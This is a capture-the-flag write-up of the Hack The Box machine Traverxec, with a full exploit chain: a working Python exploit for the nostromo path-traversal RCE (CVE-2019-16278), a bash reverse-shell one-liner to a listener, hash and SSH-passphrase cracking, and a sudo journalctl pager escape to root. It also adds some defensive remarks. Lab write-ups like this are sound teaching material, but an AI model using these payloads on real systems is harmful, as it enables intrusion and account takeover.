Basic Scan

Nmap Scan

~/Documents/HTB/Traverxec root@kali
❯ cat nmap_All.txt
# Nmap 7.80 scan initiated Wed Jan 22 11:07:40 2020 as: nmap -sC -sV -p- -oN nmap_All.txt 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.31s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 22 11:17:38 2020 -- 1 IP address (1 host up) scanned in 598.13 seconds

A full-port scan shows nothing unusual: only 22 and 80 are open. The OpenSSH build has no known exploitable remote vulnerability, so start with port 80.

User.txt

CVE Exploit

Port 80 is served by an application called nostromo, version 1.9.6. Checking shows this version is affected by CVE-2019-16278 (a path-traversal bug in nhttpd that gives remote command execution). Download the exploit locally, run it with a reverse-shell payload, and catch the initial shell on the listener:

~/Documents/HTB/Traverxec root@kali
❯ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.165] 41514
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$
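As an added example (not the exploit script the writeup downloaded), this is what that reverse-shell request looks like on the wire. It builds the request used by the public CVE-2019-16278 PoC: nhttpd refuses a path containing /../, but the .%0d./ components pass that check and still resolve to ../, so the POST reaches /bin/sh with the request body as its stdin. The listener address and port and the bash reverse-shell one-liner are assumptions for the example; the target IP is the one scanned above.

```python
import socket

# Constructed values for this example (not from the page): the target is the
# box scanned above, the listener is assumed.  Change both before use.
TARGET_HOST = "10.10.10.165"
TARGET_PORT = 80
LHOST = "10.10.14.2"
LPORT = 1337

# Path from the public PoC for CVE-2019-16278.  http_verify() in nhttpd
# rejects "/../" in the request path, but ".%0d./" (a CR between the dots)
# is not matched and still resolves to "../", so four of them walk out of
# the docroot and the request is handled as an execution of /bin/sh.
TRAVERSAL_PATH = "/.%0d./.%0d./.%0d./.%0d./bin/sh"


def build_request(cmd: str, host: str = TARGET_HOST) -> bytes:
    """Raw HTTP/1.0 POST that makes nhttpd run `cmd` through /bin/sh.

    The body becomes stdin of /bin/sh.  The two leading empty `echo` lines
    and the Content-Length of 1 are copied from the public PoC: the echoes
    supply the blank line nhttpd expects to end CGI-style response headers,
    and the server processes the whole buffer regardless of the length.
    """
    body = f"echo\necho\n{cmd} 2>&1"
    headers = (
        f"POST {TRAVERSAL_PATH} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Content-Length: 1\r\n"
        "\r\n"
    )
    return (headers + body).encode()


def reverse_shell_cmd(lhost: str = LHOST, lport: int = LPORT) -> str:
    """Bash reverse shell one-liner (assumed payload; the page does not say
    which one the author used)."""
    return f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"


def send_request(req: bytes, host: str = TARGET_HOST, port: int = TARGET_PORT,
                 timeout: float = 5.0) -> bytes:
    """Send the request and return whatever the server answers.

    Start `nc -nlvp 1337` first when sending the reverse-shell payload; the
    HTTP response itself will then be empty, the shell arrives on the listener.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req)
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


if __name__ == "__main__":
    # Sanity check before going for a shell: `id` should come back as www-data.
    print(send_request(build_request("id")).decode(errors="replace"))
    # send_request(build_request(reverse_shell_cmd()))
```

The only thing that matters for the bypass is the path: the request never contains the literal `/../` that the server filters, which is also what makes this easy to spot in web logs if the raw request line is logged.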

Migrate to High Privilege

Step1.

With a shell, upload an enumeration script as usual [LinEnum.sh]. Its output shows a password hash under /var/nostromo/conf/ and the user david:

...
[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
...

Cracked with hashcat (the $1$ prefix is md5crypt, hashcat mode 500): the password is Nowonly4me. Trying it over SSH got nowhere.
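Added check, not part of the original writeup: because the hash is md5crypt, a candidate from hashcat can be confirmed offline without the cracker. The block below implements md5crypt as specified by the FreeBSD/glibc crypt(3) code in pure Python (the standard library's crypt module is deprecated and removed in recent Python versions) and tests Nowonly4me against the line LinEnum printed.

```python
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# The htpasswd line from the LinEnum output above and the password it cracked to.
HTPASSWD_LINE = "david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/"
CANDIDATE = "Nowonly4me"


def _to64(value: int, count: int) -> str:
    """crypt(3)'s to64(): `count` base-64 digits, least significant first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: str, salt: str, magic: str = "$1$") -> str:
    """MD5-crypt ($1$) exactly as in FreeBSD/glibc crypt(3)."""
    pw = password.encode()
    sb = salt.encode()[:8]                    # salt is at most 8 characters
    ctx = hashlib.md5(pw + magic.encode() + sb)
    alt = hashlib.md5(pw + sb + pw).digest()  # MD5(pw, salt, pw)
    n = len(pw)
    while n > 0:                              # mix in len(pw) bytes of it
        ctx.update(alt[: min(16, n)])
        n -= 16
    i = len(pw)
    while i:                                  # one zero byte or pw[0] per bit
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                     # fixed 1000-round stretching
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sb)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    out = (
        _to64((final[0] << 16) | (final[6] << 8) | final[12], 4)
        + _to64((final[1] << 16) | (final[7] << 8) | final[13], 4)
        + _to64((final[2] << 16) | (final[8] << 8) | final[14], 4)
        + _to64((final[3] << 16) | (final[9] << 8) | final[15], 4)
        + _to64((final[4] << 16) | (final[10] << 8) | final[5], 4)
        + _to64(final[11], 2)
    )
    return f"{magic}{sb.decode()}${out}"


def parse_htpasswd_line(line: str):
    """Split 'user:$1$salt$hash' into (user, salt, full_hash)."""
    user, full = line.strip().split(":", 1)
    magic, salt, _digest = full[1:].split("$", 2)
    if magic != "1":
        raise ValueError(f"not an md5crypt hash: {full}")
    return user, salt, full


def check_password(line: str, candidate: str) -> bool:
    """True if `candidate` reproduces the hash on the htpasswd line."""
    _user, salt, full = parse_htpasswd_line(line)
    return md5crypt(candidate, salt) == full


if __name__ == "__main__":
    print(check_password(HTPASSWD_LINE, CANDIDATE))
```

The 1000 fixed rounds are why md5crypt cracks at millions of guesses per second on a GPU: the format has no tunable cost, which is the reason Apache and nostromo deployments should prefer bcrypt-style htpasswd entries where the server supports them.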


Keep enumerating: the conf directory under nostromo holds the application's configuration file:

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
cat nhttpd.conf
# MAIN [MANDATORY]

servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html

# LOGS [OPTIONAL]

logpid logs/nhttpd.pid

# SETUID [RECOMMENDED]

user www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs /home
homedirs_public public_www

The relevant section of the documentation for this file [http://www.nazgul.ch/dev/nostromo_man.html]:

HOMEDIRS
To serve the home directories of your users via HTTP, enable the homedirs
option by defining the path in where the home directories are stored,
normally /home. To access a users home directory enter a ~ in the URL
followed by the home directory name like in this example:

http://www.nazgul.ch/~hacki/

The content of the home directory is handled exactly the same way as a
directory in your document root. If some users don't want that their
home directory can be accessed via HTTP, they shall remove the world
readable flag on their home directory and a caller will receive a 403
Forbidden response. Also, if basic authentication is enabled, a user can
create an .htaccess file in his home directory and a caller will need to
authenticate.

You can restrict the access within the home directories to a single sub
directory by defining it via the homedirs_public option.

So homedirs is set to /home, and /home contains the user david. homedirs_public is set to public_www, which means a request for /~david/ is served from /home/david/public_www rather than from the whole home directory.

Step2.

Inside that directory is an archive named backup-ssh-identity-files.tgz, which looks like a backup of SSH keys:

www-data@traverxec:/var/nostromo/conf$ cd /home/david/public_www
cd /home/david/public_www
www-data@traverxec:/home/david/public_www$ ls -la
ls -la
total 16
drwxr-xr-x 3 david david 4096 Oct 25 15:45 .
drwx--x--x 5 david david 4096 Jan 22 00:18 ..
-rw-r--r-- 1 david david 402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area
www-data@traverxec:/home/david/public_www$ cd protected-file-area
cd protected-file-area
www-data@traverxec:/home/david/public_www/protected-file-area$ ls -la
ls -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25 17:02 .
drwxr-xr-x 3 david david 4096 Oct 25 15:45 ..
-rw-r--r-- 1 david david 45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25 17:02 backup-ssh-identity-files.tgz
www-data@traverxec:/home/david/public_www/protected-file-area$

Downloaded locally, it is indeed an SSH key pair, but the private key (id_rsa) is passphrase-protected, so brute-force the passphrase with john via ssh2john. (The .htaccess next to the archive means that over HTTP, at /~david/protected-file-area/, nostromo would demand Basic auth against the .htpasswd found earlier; that is what the cracked password Nowonly4me is for, which is why it did nothing for SSH. From the www-data shell the directory is world-readable, so the file can simply be copied out.)

~/Documents/HTB/Traverxec root@kali
❯ python /usr/share/john/ssh2john.py id_rsa >id_rsa.john

~/Documents/HTB/Traverxec root@kali
❯ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
1g 0:00:00:06 DONE (2020-01-22 18:05) 0.1506g/s 2159Kp/s 2159Kc/s 2159KC/s a6_123..*7¡Vamos!
Session completed
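Added example, not from the writeup: john's cost lines above say the key is in the legacy PEM format (cost 1 = 0, MD5/AES; iteration count 1), which is why rockyou went through in six seconds. The inspector below reads either private-key header and reports the cipher, KDF and rounds, so you know before cracking whether each guess costs one MD5 or bcrypt at N rounds. Both sample keys are constructed inside the block (they are not the key from the box); only their headers are meaningful, the key material is dummy.

```python
import base64
import struct

# Constructed sample keys for this example (not the key from the box).
# 1) Legacy PEM: the passphrase becomes the AES key through a single MD5
#    pass (john's "0=MD5/AES", iteration count 1).  Body is dummy base64;
#    only the headers matter to the inspector.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----
"""

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(b: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(b)) + b


def make_openssh_v1_header(cipher: bytes, kdf: bytes, salt: bytes, rounds: int) -> str:
    """Construct an openssh-key-v1 file whose header fields are real but
    whose key material is absent (enough for inspect_key below)."""
    kdfoptions = (_ssh_string(salt) + struct.pack(">I", rounds)) if kdf == b"bcrypt" else b""
    blob = (OPENSSH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfoptions) + struct.pack(">I", 1))  # nkeys = 1
    b64 = base64.b64encode(blob).decode()
    lines = [b64[i:i + 70] for i in range(0, len(b64), 70)]
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + "\n".join(lines)
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


# 2) New format (ssh-keygen -o, default since OpenSSH 7.8): bcrypt KDF, 16 rounds.
NEW_FORMAT_KEY = make_openssh_v1_header(b"aes256-ctr", b"bcrypt", b"\x01" * 16, 16)


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    return buf[off:off + n], off + n


def inspect_key(text: str) -> dict:
    """Report format, cipher, KDF and KDF rounds of an SSH private key."""
    lines = [l.strip() for l in text.strip().splitlines()]
    head, body = lines[0], lines[1:-1]
    if head == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(body))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":          # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o)
        return {"format": "openssh-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    # Legacy PEM: RFC 1421-style headers up to the first blank line.
    hdr = {}
    for l in body:
        if not l:
            break
        if ":" in l:
            k, v = l.split(":", 1)
            hdr[k.strip()] = v.strip()
    encrypted = hdr.get("Proc-Type") == "4,ENCRYPTED"
    cipher = hdr["DEK-Info"].split(",")[0] if encrypted else "none"
    # OpenSSL derives the key with EVP_BytesToKey: one MD5 pass, no stretching.
    return {"format": "legacy-pem", "encrypted": encrypted, "cipher": cipher,
            "kdf": "md5" if encrypted else None, "rounds": 1 if encrypted else None}


if __name__ == "__main__":
    print(inspect_key(LEGACY_PEM))
    print(inspect_key(NEW_FORMAT_KEY))
```

For a key like the one in this backup the practical lesson is on the defending side: re-encrypting it with `ssh-keygen -p -o -a 64` moves it to the bcrypt format, where each guess costs the cracker 64 bcrypt rounds instead of a single MD5.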

The passphrase is hunter. Log in with the key and that passphrase, and read user.txt:

~/Documents/HTB/Traverxec root@kali
❯ ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Wed Jan 22 00:15:28 2020 from 10.10.14.2
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d
david@traverxec:~$

Root.txt

Enumerating further in david's home directory turns up server-stats.sh, which runs journalctl via sudo. GTFOBins lists journalctl: the interactive pager it spawns can be escaped to a shell.

david@traverxec:~$ ls
bin LinEnum.sh public_www user.txt
david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls
server-stats.head server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
david@traverxec:~/bin$

Several attempts went nowhere, until someone pointed out that resizing the terminal makes the escape easier. Once I had shrunk the window to the point where the command no longer fit on one line, the escape worked. [I still do not know why.]

What is going on: when its stdout is a terminal, journalctl hands its output to a pager (less, with LESS set so that it exits at once if everything fits on one screen). The script sidesteps this with `| /usr/bin/cat`, so running server-stats.sh never shows a pager; the sudo command has to be typed directly, with exactly the arguments the sudo rule allows, and its output has to be too big for the screen, which is what shrinking the window achieves. Once less is sitting at its prompt, `!/bin/bash` runs a shell as the pager's user, and under sudo that is root. On the defending side the fix is to pin `--no-pager` into the sudo-allowed command string (or not to grant journalctl at all); the `| cat` in a wrapper script protects nothing, because the user can run the sudo command without it.

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2020-01-21 22:06:45 EST, end at Wed 2020-01-22 05:
Jan 22 04:44:44 traverxec sudo[2726]: pam_unix(sudo:auth): authenticati
Jan 22 04:44:46 traverxec sudo[2726]: pam_unix(sudo:auth): conversation
Jan 22 04:44:46 traverxec sudo[2726]: pam_unix(sudo:auth): auth could n
Jan 22 04:44:46 traverxec sudo[2726]: www-data : command not allowed ;
Jan 22 04:44:46 traverxec crontab[2783]: (www-data) LIST (www-data)
!/bin/bash
root@traverxec:/home/david/bin# id
uid=0(root) gid=0(root) groups=0(root)
root@traverxec:/home/david/bin# cd
root@traverxec:~# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906
root@traverxec:~#